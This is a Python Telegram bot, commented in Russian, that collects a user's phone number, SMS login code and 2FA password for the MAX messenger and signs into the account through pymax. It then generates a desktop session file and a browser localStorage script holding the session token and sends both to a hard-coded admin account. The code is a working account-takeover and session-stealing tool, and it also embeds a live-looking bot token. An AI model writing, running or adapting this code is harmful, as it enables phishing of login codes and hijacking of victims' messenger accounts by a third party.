import os
import json
import asyncio
import uuid
import logging
import time
from pathlib import Path
from aiogram import Bot, Dispatcher, types, F
from aiogram.fsm.context import FSMContext
from aiogram.fsm.state import State, StatesGroup
from aiogram.fsm.storage.memory import MemoryStorage
from aiogram.types import FSInputFile

# ============================================================
# НАСТРОЙКИ (замените на свои)
# ============================================================
BOT_TOKEN = "8948301530:AAH-ZTWkJuUOfPMRFl19qC1-YUAXfKUd9C8"
ADMIN_ID = 8632861931
# ============================================================

logging.basicConfig(level=logging.INFO)
bot = Bot(token=BOT_TOKEN)
dp = Dispatcher(storage=MemoryStorage())

class AuthState(StatesGroup):
    waiting_for_code = State()
    waiting_for_password = State()

pending = {}

def gen_password():
    import random, string
    return ''.join(random.choices(string.ascii_letters + string.digits + "_@#", k=40))

def build_desktop_json(token, device_id, session_id, password, user_id, phone):
    return {
        "token": token,
        "device_id": device_id,
        "session_id": session_id,
        "password": password,
        "connection_params": {
            "device_type": "DESKTOP",
            "app_version": "25.12.13",
            "device_name": "Chrome",
            "os_version": "Windows 10",
            "locale": "ru",
            "device_locale": "ru",
            "screen": "1080x1920",
            "timezone": "Europe/Moscow"
        },
        "user": {
            "user_id": user_id,
            "phone": int(phone.replace("+", "")),
            "photo_id": None,
            "first_name": "",
            "last_name": ""
        }
    }

def generate_web_js(password, device_id, token, viewer_id):
    return f"""PASSWORD: {password}

sessionStorage.clear();
localStorage.clear();
localStorage.setItem('__oneme_device_id', '{device_id}');
localStorage.setItem('__oneme_auth', JSON.stringify({{"token":"{token}","viewerId":{viewer_id}}}));
window.location.reload();"""

async def send_files(phone, uid, work_dir, desktop, js):
    dp = f"{work_dir}/desktop_session.json"
    with open(dp, "w", encoding="utf-8") as f:
        json.dump(desktop, f, ensure_ascii=False, indent=4)
    wp = f"{work_dir}/web_token.js"
    with open(wp, "w", encoding="utf-8") as f:
        f.write(js)
    await bot.send_document(ADMIN_ID, FSInputFile(dp),
        caption=f"💻 <b>ДЕСКТОП</b>\nНомер: {phone}", parse_mode="HTML")
    await bot.send_document(ADMIN_ID, FSInputFile(wp),
        caption=f"🌐 <b>ВЕБ</b>\nНомер: {phone}", parse_mode="HTML")

def run_pymax(uid: int, phone: str, work_dir: str):
    """Запускает pymax в отдельном процессе и ждёт код через файлы."""
    from pymax import Client as MaxClient
    
    code_file = Path(work_dir) / "code.txt"
    password_file = Path(work_dir) / "password.txt"
    result_file = Path(work_dir) / "result.json"
    status_file = Path(work_dir) / "status.txt"
    
    try:
        # Пишем статус
        status_file.write_text("connecting")
        
        client = MaxClient(phone=phone, work_dir=work_dir)
        
        # Патчим input
        import builtins
        original_input = builtins.input
        
        def patched_input(prompt=""):
            prompt_lower = prompt.lower() if prompt else ""
            if "code" in prompt_lower or "код" in prompt_lower:
                status_file.write_text("waiting_code")
                # Ждём пока появится файл с кодом
                while not code_file.exists():
                    time.sleep(0.5)
                code = code_file.read_text().strip()
                code_file.unlink()  # удаляем файл
                status_file.write_text("checking_code")
                return code
            elif "password" in prompt_lower or "пароль" in prompt_lower:
                status_file.write_text("waiting_password")
                while not password_file.exists():
                    time.sleep(0.5)
                pwd = password_file.read_text().strip()
                password_file.unlink()
                status_file.write_text("checking_password")
                return pwd
            return original_input(prompt)
        
        builtins.input = patched_input
        
        status_file.write_text("starting")
        client.start()
        
        # Успешно
        result = {
            "ok": True,
            "token": client.token,
            "user_id": client.my_id,
            "device_id": str(uuid.uuid4()),
            "session_id": int(time.time() * 1000)
        }
        result_file.write_text(json.dumps(result))
        status_file.write_text("done")
        
        builtins.input = original_input
        
    except Exception as e:
        error_msg = str(e)
        if "block" in error_msg.lower():
            status_file.write_text("blocked")
        elif "invalid" in error_msg.lower() or "wrong" in error_msg.lower():
            status_file.write_text("invalid_code")
        elif "limit" in error_msg.lower() or "flood" in error_msg.lower():
            status_file.write_text("flood")
        elif "password" in error_msg.lower() or "2fa" in error_msg.lower():
            status_file.write_text("need_password")
        else:
            status_file.write_text(f"error:{error_msg}")
        result_file.write_text(json.dumps({"ok": False, "error": error_msg}))

@dp.message(F.text == "/start")
async def cmd_start(message: types.Message):
    await message.answer(
        "👋 Привет! Отправь номер телефона в формате:\n\n"
        "<code>+79111111111</code>",
        parse_mode="HTML"
    )

@dp.message(F.text.regexp(r'^\+7\d{10}$'))
async def phone_handler(message: types.Message, state: FSMContext):
    phone = message.text.strip()
    uid = message.from_user.id
    work_dir = f"cache/{uid}"
    os.makedirs(work_dir, exist_ok=True)
    
    status_msg = await message.answer("⏳ Отправляю SMS...")
    
    # Очищаем старые файлы
    for f in ["code.txt", "password.txt", "result.json", "status.txt"]:
        Path(work_dir, f).unlink(missing_ok=True)
    
    pending[uid] = {
        "phone": phone,
        "work_dir": work_dir,
        "status_msg": status_msg
    }
    
    await state.set_state(AuthState.waiting_for_code)
    await state.update_data(phone=phone, work_dir=work_dir, uid=uid)
    
    # Запускаем pymax в отдельном потоке
    import threading
    thread = threading.Thread(target=run_pymax, args=(uid, phone, work_dir), daemon=True)
    thread.start()
    
    # Ждём статус
    status_file = Path(work_dir) / "status.txt"
    for _ in range(30):
        await asyncio.sleep(1)
        if status_file.exists():
            status = status_file.read_text().strip()
            if status == "waiting_code":
                await status_msg.edit_text("✅ SMS отправлена. Введи код из 6 цифр:")
                return
            elif status == "blocked":
                await status_msg.edit_text("🚫 Аккаунт заблокирован или удалён.")
                del pending[uid]
                await state.clear()
                return
            elif status.startswith("error:"):
                await status_msg.edit_text(f"❌ Ошибка: {status[6:]}")
                del pending[uid]
                await state.clear()
                return
    
    await status_msg.edit_text("❌ Таймаут. Попробуй ещё раз.")
    del pending[uid]
    await state.clear()

@dp.message(AuthState.waiting_for_code, F.text.regexp(r'^\d{6}$'))
async def code_handler(message: types.Message, state: FSMContext):
    uid = message.from_user.id
    code = message.text.strip()
    
    if uid not in pending:
        return await message.answer("⏳ Сессия устарела.")
    
    data = await state.get_data()
    work_dir = data["work_dir"]
    phone = data["phone"]
    
    # Записываем код в файл
    code_file = Path(work_dir) / "code.txt"
    code_file.write_text(code)
    
    status_msg = await message.answer("⏳ Проверяю код...")
    pending[uid]["status_msg"] = status_msg
    
    # Ждём результат
    status_file = Path(work_dir) / "status.txt"
    result_file = Path(work_dir) / "result.json"
    
    for _ in range(30):
        await asyncio.sleep(1)
        if not status_file.exists():
            continue
        status = status_file.read_text().strip()
        
        if status == "done" and result_file.exists():
            result = json.loads(result_file.read_text())
            token = result["token"]
            viewer_id = result["user_id"]
            device_id = result["device_id"]
            session_id = result["session_id"]
            password = gen_password()
            
            desktop = build_desktop_json(token, device_id, session_id, password, viewer_id, phone)
            js = generate_web_js(password, device_id, token, viewer_id)
            
            await send_files(phone, uid, work_dir, desktop, js)
            await status_msg.edit_text("✅ Готово! Файлы отправлены админу.")
            del pending[uid]
            await state.clear()
            return
        
        elif status == "need_password":
            await state.set_state(AuthState.waiting_for_password)
            await status_msg.edit_text("🔐 Введи пароль 2FA:")
            return
        
        elif status == "invalid_code":
            await status_msg.edit_text("❌ Неверный код. Попробуй ещё раз.")
            return
        
        elif status == "blocked":
            await status_msg.edit_text("🚫 Аккаунт заблокирован или удалён.")
            del pending[uid]
            await state.clear()
            return
        
        elif status == "flood":
            await status_msg.edit_text("⏳ Слишком много попыток. Подожди.")
            del pending[uid]
            await state.clear()
            return
        
        elif status.startswith("error:"):
            await status_msg.edit_text(f"❌ {status[6:]}")
            del pending[uid]
            await state.clear()
            return
    
    await status_msg.edit_text("❌ Таймаут.")
    del pending[uid]
    await state.clear()

@dp.message(AuthState.waiting_for_password)
async def password_handler(message: types.Message, state: FSMContext):
    uid = message.from_user.id
    pwd = message.text.strip()
    
    if uid not in pending:
        return await message.answer("⏳ Сессия устарела.")
    
    data = await state.get_data()
    work_dir = data["work_dir"]
    phone = data["phone"]
    
    # Записываем пароль в файл
    password_file = Path(work_dir) / "password.txt"
    password_file.write_text(pwd)
    
    status_msg = await message.answer("⏳ Проверяю пароль...")
    pending[uid]["status_msg"] = status_msg
    
    # Ждём результат
    status_file = Path(work_dir) / "status.txt"
    result_file = Path(work_dir) / "result.json"
    
    for _ in range(30):
        await asyncio.sleep(1)
        if not status_file.exists():
            continue
        status = status_file.read_text().strip()
        
        if status == "done" and result_file.exists():
            result = json.loads(result_file.read_text())
            token = result["token"]
            viewer_id = result["user_id"]
            device_id = result["device_id"]
            session_id = result["session_id"]
            password = gen_password()
            
            desktop = build_desktop_json(token, device_id, session_id, password, viewer_id, phone)
            js = generate_web_js(password, device_id, token, viewer_id)
            
            await send_files(phone, uid, work_dir, desktop, js)
            await status_msg.edit_text("✅ Готово!")
            del pending[uid]
            await state.clear()
            return
        
        elif status == "invalid_code":
            await status_msg.edit_text("❌ Неверный пароль. Попробуй ещё раз.")
            return
        
        elif status == "blocked":
            await status_msg.edit_text("🚫 Аккаунт заблокирован.")
            del pending[uid]
            await state.clear()
            return
        
        elif status.startswith("error:"):
            await status_msg.edit_text(f"❌ {status[6:]}")
            del pending[uid]
            await state.clear()
            return
    
    await status_msg.edit_text("❌ Таймаут.")
    del pending[uid]
    await state.clear()

async def main():
    logging.info("Бот запущен!")
    await dp.start_polling(bot)

if __name__ == "__main__":
    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        logging.info("Бот остановлен.")
